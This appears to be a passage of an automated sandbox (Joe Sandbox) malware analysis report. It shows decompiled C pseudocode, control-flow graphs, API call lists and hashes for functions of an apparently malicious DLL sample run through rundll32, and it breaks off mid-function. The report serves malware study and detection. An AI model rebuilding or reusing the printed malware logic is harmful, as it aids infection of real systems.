                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E05476A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x547d238 = _t10;
				if(_t10 != 0) {
					 *0x547d1a8 = GetTickCount();
					_t12 = E05478F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L0547B226();
							_t33 = _t14 + _t16;
							_t18 = E05477E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E05476B96(_t25) != 0) {
							 *0x547d260 = 1; // executed
						}
						_t12 = E0547225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                  0x05476a56
                                                  0x05476a5c
                                                  0x05476a5d
                                                  0x05476a69
                                                  0x05476a71
                                                  0x05476a76
                                                  0x05476a86
                                                  0x05476a8b
                                                  0x05476a92
                                                  0x05476a94
                                                  0x05476a99
                                                  0x05476a9f
                                                  0x05476aa5
                                                  0x05476aaf
                                                  0x05476ab3
                                                  0x05476ab5
                                                  0x05476aba
                                                  0x05476abb
                                                  0x05476abc
                                                  0x05476ac1
                                                  0x05476ac7
                                                  0x05476ad0
                                                  0x05476ad1
                                                  0x05476ad6
                                                  0x05476adc
                                                  0x05476ae8
                                                  0x05476aea
                                                  0x05476aea
                                                  0x05476af4
                                                  0x05476af4
                                                  0x05476a78
                                                  0x05476a7a
                                                  0x05476a7a
                                                  0x05476afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,0547807D,?), ref: 05476A69
                                                  • GetTickCount.KERNEL32 ref: 05476A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,0547807D,?), ref: 05476A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05476A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 05476ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,0547807D,?), ref: 05476AD6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: ac8a19f476760b24cc7c8ddb27aae6cd98b72166b4909139214b289d1a3f945f
                                                  • Instruction ID: c242aac3ddfd5e14cbffb6229f4c2281512bed8481a0b8be0f7fd8d15bd5f4bf
                                                  • Opcode Fuzzy Hash: ac8a19f476760b24cc7c8ddb27aae6cd98b72166b4909139214b289d1a3f945f
                                                  • Instruction Fuzzy Hash: A911C672B1460C6FE728ABA5DC4EFEA3F99EB45350F11452EF505D6280EEB0D80086A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 185 547225b-5472276 call 547550e 188 547228c-547229a 185->188 189 5472278-5472286 185->189 191 54722ac-54722c7 call 5473d0d 188->191 192 547229c-547229f 188->192 189->188 198 54722d1 191->198 199 54722c9-54722cf 191->199 192->191 193 54722a1-54722a6 192->193 193->191 195 547242d 193->195 197 547242f-5472435 195->197 200 54722d7-54722ec call 5471bf4 call 5471b2f 198->200 199->200 205 54722f7-54722fc 200->205 206 54722ee-54722f1 CloseHandle 200->206 207 5472322-547233a call 5472049 205->207 208 54722fe-5472303 205->208 206->205 217 5472366-5472368 207->217 218 547233c-5472364 memset RtlInitializeCriticalSection 207->218 210 5472419-547241d 208->210 211 5472309 208->211 212 5472425-547242b 210->212 213 547241f-5472423 210->213 214 547230c-547231b call 547a501 211->214 212->197 213->197 213->212 222 547231d 214->222 221 5472369-547236d 217->221 218->221 221->210 223 5472373-5472389 RtlAllocateHeap 221->223 222->210 224 547238b-54723b7 wsprintfA 223->224 225 54723b9-54723bb 223->225 226 54723bc-54723c0 224->226 225->226 226->210 227 54723c2-54723e2 call 547269c call 5474094 226->227 227->210 232 54723e4-54723eb call 54796a4 227->232 235 54723f2-54723f9 232->235 236 54723ed-54723f0 232->236 237 547240e-5472412 call 5476786 235->237 238 54723fb-54723fd 235->238 236->210 242 5472417 237->242 238->210 239 54723ff-5472403 call 5473dd9 238->239 243 5472408-547240c 239->243 242->210 243->210 243->237
                                                  C-Code - Quality: 57%
                                                  			E0547225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E0547550E();
				if(_t21 != 0) {
					_t59 =  *0x547d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x547d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x547d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E05473D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x547d27c; // 0x1f6a5a8
					if( *0x547d25c > 5) {
						_t8 = _t26 + 0x547e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x547ea15; // 0x44283a44
						_t27 = _t7;
					}
					E05471BF4(_t27, _t27);
					_t31 = E05471B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x547d270 =  *0x547d270 ^ 0x81bbe65d;
						_t32 = E05472049(0x60);
						__eflags = _t32;
						 *0x547d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x547d32c; // 0x73e95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x547d32c; // 0x73e95b0
							 *_t51 = 0x547e836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x547d238, 0, 0x43);
							__eflags = _t36;
							 *0x547d2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x547d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x547d27c; // 0x1f6a5a8
								_t13 = _t58 + 0x547e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x547c2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E0547269C( ~_v8 &  *0x547d270, 0x547d00c); // executed
								_t42 = E05474094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E054796A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E05476786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E05473DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x547d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E0547A501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                  0x0547225b
                                                  0x05472266
                                                  0x05472269
                                                  0x0547226c
                                                  0x0547226f
                                                  0x05472276
                                                  0x05472278
                                                  0x05472284
                                                  0x05472286
                                                  0x05472286
                                                  0x0547228f
                                                  0x05472297
                                                  0x0547229a
                                                  0x054722b4
                                                  0x054722c0
                                                  0x054722c2
                                                  0x054722c7
                                                  0x054722d1
                                                  0x054722d1
                                                  0x054722c9
                                                  0x054722c9
                                                  0x054722c9
                                                  0x054722c9
                                                  0x054722d8
                                                  0x054722e5
                                                  0x054722ec
                                                  0x054722f1
                                                  0x054722f1
                                                  0x054722f9
                                                  0x054722fc
                                                  0x05472322
                                                  0x0547232e
                                                  0x05472333
                                                  0x05472335
                                                  0x0547233a
                                                  0x05472366
                                                  0x05472368
                                                  0x0547233c
                                                  0x05472340
                                                  0x05472345
                                                  0x0547234a
                                                  0x05472351
                                                  0x05472357
                                                  0x0547235c
                                                  0x05472362
                                                  0x05472369
                                                  0x0547236b
                                                  0x0547236d
                                                  0x0547237c
                                                  0x05472382
                                                  0x05472384
                                                  0x05472389
                                                  0x054723b9
                                                  0x054723bb
                                                  0x0547238b
                                                  0x0547238b
                                                  0x05472391
                                                  0x0547239e
                                                  0x054723a4
                                                  0x054723a4
                                                  0x054723ac
                                                  0x054723b5
                                                  0x054723bc
                                                  0x054723be
                                                  0x054723c0
                                                  0x054723c7
                                                  0x054723d4
                                                  0x054723d9
                                                  0x054723de
                                                  0x054723e0
                                                  0x054723e2
                                                  0x00000000
                                                  0x00000000
                                                  0x054723e4
                                                  0x054723e9
                                                  0x054723eb
                                                  0x054723f2
                                                  0x054723f6
                                                  0x054723f9
                                                  0x0547240e
                                                  0x05472412
                                                  0x05472417
                                                  0x00000000
                                                  0x05472417
                                                  0x054723fb
                                                  0x054723fd
                                                  0x00000000
                                                  0x00000000
                                                  0x05472403
                                                  0x05472408
                                                  0x0547240a
                                                  0x0547240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547240c
                                                  0x054723ef
                                                  0x054723ef
                                                  0x054723c0
                                                  0x054722fe
                                                  0x054722fe
                                                  0x05472303
                                                  0x05472419
                                                  0x0547241d
                                                  0x05472425
                                                  0x05472425
                                                  0x00000000
                                                  0x0547241d
                                                  0x05472309
                                                  0x0547230c
                                                  0x05472316
                                                  0x0547231d
                                                  0x00000000
                                                  0x0547242d
                                                  0x0547242d
                                                  0x05472431
                                                  0x05472435
                                                  0x05472435

                                                  APIs
                                                    • Part of subcall function 0547550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,05472274,00000000,00000000), ref: 0547551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 054722F1
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • memset.NTDLL ref: 05472340
                                                  • RtlInitializeCriticalSection.NTDLL(073E9570), ref: 05472351
                                                    • Part of subcall function 05473DD9: memset.NTDLL ref: 05473DEE
                                                    • Part of subcall function 05473DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 05473E22
                                                    • Part of subcall function 05473DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 05473E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0547237C
                                                  • wsprintfA.USER32 ref: 054723AC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 0463c6ce1c107b94473fa2a310d5779fdda355d9221da595cd53cb59c08aa1d2
                                                  • Instruction ID: c830ce3a947aee9234f36231ce2323584afe152afe2d51af8299c982ae2183c8
                                                  • Opcode Fuzzy Hash: 0463c6ce1c107b94473fa2a310d5779fdda355d9221da595cd53cb59c08aa1d2
                                                  • Instruction Fuzzy Hash: 1851BA75F2421D9BDB289BB5DC49EEF3BA9BF04604F0044ABF501E7240EBB4D9459B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054794A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 244 54794a9-54794bc 245 54794c3-54794c7 StrChrA 244->245 246 54794be-54794c2 245->246 247 54794c9-54794da call 5472049 245->247 246->245 250 547951f 247->250 251 54794dc-54794e8 StrTrimA 247->251 252 5479521-5479528 250->252 253 54794ea-54794f3 StrChrA 251->253 254 5479505-5479511 253->254 255 54794f5-54794ff StrTrimA 253->255 254->253 256 5479513-547951d 254->256 255->254 256->252
                                                  C-Code - Quality: 53%
                                                  			E054794A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E05472049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x547c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x547c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                  0x054794b4
                                                  0x054794b8
                                                  0x054794ba
                                                  0x054794bb
                                                  0x054794c3
                                                  0x054794c3
                                                  0x054794c7
                                                  0x00000000
                                                  0x00000000
                                                  0x054794be
                                                  0x054794bf
                                                  0x054794c2
                                                  0x054794c2
                                                  0x054794cf
                                                  0x054794d6
                                                  0x054794da
                                                  0x054794e2
                                                  0x054794e8
                                                  0x054794ea
                                                  0x054794ef
                                                  0x054794f3
                                                  0x054794f5
                                                  0x054794f8
                                                  0x054794ff
                                                  0x054794ff
                                                  0x05479509
                                                  0x0547950c
                                                  0x0547950f
                                                  0x0547950f
                                                  0x0547951b
                                                  0x0547951b
                                                  0x05479528

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,073E95AC,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794C3
                                                  • StrTrimA.KERNELBASE(?,0547C2A4,00000002,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794ED
                                                  • StrTrimA.SHLWAPI(00000001,0547C2A4,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794FF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: 352e20b7473d419cb8a55dca8b83f7ab7fc53f54e39b5836b1f7fe71dadc50cb
                                                  • Instruction ID: 4d5889cf8b1aef980e786c160a9a69742aa80dad1455e6087f485b0905bc4f2e
                                                  • Opcode Fuzzy Hash: 352e20b7473d419cb8a55dca8b83f7ab7fc53f54e39b5836b1f7fe71dadc50cb
                                                  • Instruction Fuzzy Hash: BB01B572A093296FD230DE698C49FFB7F98FF86650F11055AF941C7340DB60C80196A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05473DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			E05473DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x547d27c; // 0x1f6a5a8
				_t5 = _t40 + 0x547ee40; // 0x410025
				_t85 = E05476A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E05479039(_v16);
					goto L24;
				}
				if(E0547A72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E0547809F(0,  *0x547d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x547d27c; // 0x1f6a5a8
					_t11 = _t52 + 0x547e81a; // 0x65696c43
					_t55 = E0547809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E05476BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E05479039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E05479039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E05471F99(_t86);
						}
						goto L22;
					} else {
						if(( *0x547d260 & 0x00000001) == 0) {
							L14:
							E05478F83(_t80, _v88, _v84,  *0x547d270, 0);
							_t80 = E05471C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E054742EA( &_v40, 0);
							}
							E05479039(_v88);
							goto L17;
						}
						_t67 =  *0x547d27c; // 0x1f6a5a8
						_t18 = _t67 + 0x547e823; // 0x65696c43
						_t70 = E0547809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E05476BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E05479039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                  0x05473deb
                                                  0x05473dee
                                                  0x05473df5
                                                  0x05473dfb
                                                  0x05473dfc
                                                  0x05473dfd
                                                  0x05473dfe
                                                  0x05473dff
                                                  0x05473e00
                                                  0x05473e08
                                                  0x05473e14
                                                  0x05473e18
                                                  0x05473e1b
                                                  0x05473f6b
                                                  0x05473f6e
                                                  0x05473f72
                                                  0x05473f72
                                                  0x05473e2d
                                                  0x05473e35
                                                  0x05473f5e
                                                  0x05473f5f
                                                  0x05473f62
                                                  0x00000000
                                                  0x05473f62
                                                  0x05473e47
                                                  0x05473e49
                                                  0x05473e49
                                                  0x05473e54
                                                  0x05473e5b
                                                  0x05473e5e
                                                  0x05473f4d
                                                  0x00000000
                                                  0x05473e64
                                                  0x05473e64
                                                  0x05473e69
                                                  0x05473e72
                                                  0x05473e77
                                                  0x05473e80
                                                  0x05473ea3
                                                  0x05473e82
                                                  0x05473e98
                                                  0x05473e9a
                                                  0x05473e9a
                                                  0x05473ea6
                                                  0x05473f41
                                                  0x05473f44
                                                  0x05473f4e
                                                  0x05473f4e
                                                  0x05473f53
                                                  0x05473f55
                                                  0x05473f55
                                                  0x00000000
                                                  0x05473eac
                                                  0x05473eb3
                                                  0x05473ef4
                                                  0x05473f05
                                                  0x05473f1b
                                                  0x05473f1f
                                                  0x05473f24
                                                  0x05473f2a
                                                  0x05473f37
                                                  0x05473f37
                                                  0x05473f3c
                                                  0x00000000
                                                  0x05473f3c
                                                  0x05473eb5
                                                  0x05473eba
                                                  0x05473ec3
                                                  0x05473ec8
                                                  0x05473ecc
                                                  0x05473eef
                                                  0x05473ece
                                                  0x05473ee4
                                                  0x05473ee6
                                                  0x05473ee6
                                                  0x05473ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x05473ef2
                                                  0x05473ea6

                                                  APIs
                                                  • memset.NTDLL ref: 05473DEE
                                                    • Part of subcall function 05476A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,05473E14,00410025,00000005,?,00000000), ref: 05476A23
                                                    • Part of subcall function 05476A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 05476A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 05473E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 05473E2D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: e197eafe5bb4fccacf62f36b6c9527a0dae17baa57865baa9030678361769bba
                                                  • Instruction ID: 932e712f1358156a524547ab21630f5caefdd653fa4afaffc7faffc8339e9932
                                                  • Opcode Fuzzy Hash: e197eafe5bb4fccacf62f36b6c9527a0dae17baa57865baa9030678361769bba
                                                  • Instruction Fuzzy Hash: 88414C72A1121CAEDB11EEE5CC88DEF7BBDBF08240B00456BF515AB210DA71DA459B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05478055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 313 5478055-5478060 314 5478085-5478092 InterlockedDecrement 313->314 315 5478062-5478063 313->315 317 5478099-547809c 314->317 318 5478094 call 547970f 314->318 316 5478065-5478072 InterlockedIncrement 315->316 315->317 316->317 319 5478074-5478078 call 5476a56 316->319 318->317 322 547807d-547807f 319->322 322->317 323 5478081-5478083 322->323 323->317
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x547d23c) == 0) {
						E0547970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x547d23c) == 1) {
						_t10 = E05476A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                  0x0547805c
                                                  0x0547805d
                                                  0x05478060
                                                  0x05478092
                                                  0x05478094
                                                  0x05478094
                                                  0x05478062
                                                  0x05478063
                                                  0x05478078
                                                  0x0547807f
                                                  0x05478081
                                                  0x05478081
                                                  0x0547807f
                                                  0x05478063
                                                  0x0547809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(0547D23C), ref: 0547806A
                                                    • Part of subcall function 05476A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,0547807D,?), ref: 05476A69
                                                  • InterlockedDecrement.KERNEL32(0547D23C), ref: 0547808A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: bf334d89559618ad79bca68bf68581d7496827cf78ebf8ce43ad2d40798d6adc
                                                  • Instruction ID: d5d0bd912213677b93fdb807bd7b0f54c52179c09b09d3f57b8ac938fac09ade
                                                  • Opcode Fuzzy Hash: bf334d89559618ad79bca68bf68581d7496827cf78ebf8ce43ad2d40798d6adc
                                                  • Instruction Fuzzy Hash: 94E026343242AD5382346BB4884CFEFAF0ABF00A80F03445BF785D0160CA20C8819AD2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054773FD, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 324 54773fd-5477410 call 547a72d 326 5477415-5477417 324->326 327 547741c-547743e call 5471262 326->327 328 5477419 326->328 331 5477444-547745e 327->331 332 54774fd-5477502 327->332 328->327 337 5477464-5477480 call 5477cb8 331->337 338 54774ed-54774ef 331->338 333 5477504 call 5471f99 332->333 334 5477509-547750f 332->334 333->334 339 54774f0-54774fb HeapFree 337->339 342 5477482-547749b call 54789d6 337->342 338->339 339->332 345 54774bd-54774eb call 5472659 HeapFree 342->345 346 547749d-54774a4 342->346 345->339 346->345 347 54774a6-54774b8 call 54789d6 346->347 347->345
                                                  C-Code - Quality: 87%
                                                  			E054773FD(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0547A72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x547d27c; // 0x1f6a5a8
				_t4 = _t24 + 0x547ede0; // 0x73e9388
				_t5 = _t24 + 0x547ed88; // 0x4f0053
				_t45 = E05471262( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x547d0f4(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x547d27c; // 0x1f6a5a8
						_t11 = _t32 + 0x547edd4; // 0x73e937c
						_t48 = _t11;
						_t12 = _t32 + 0x547ed88; // 0x4f0053
						_t55 = E05477CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x547d27c; // 0x1f6a5a8
							_t13 = _t35 + 0x547ee1e; // 0x30314549
							if(E054789D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x547d25c - 6;
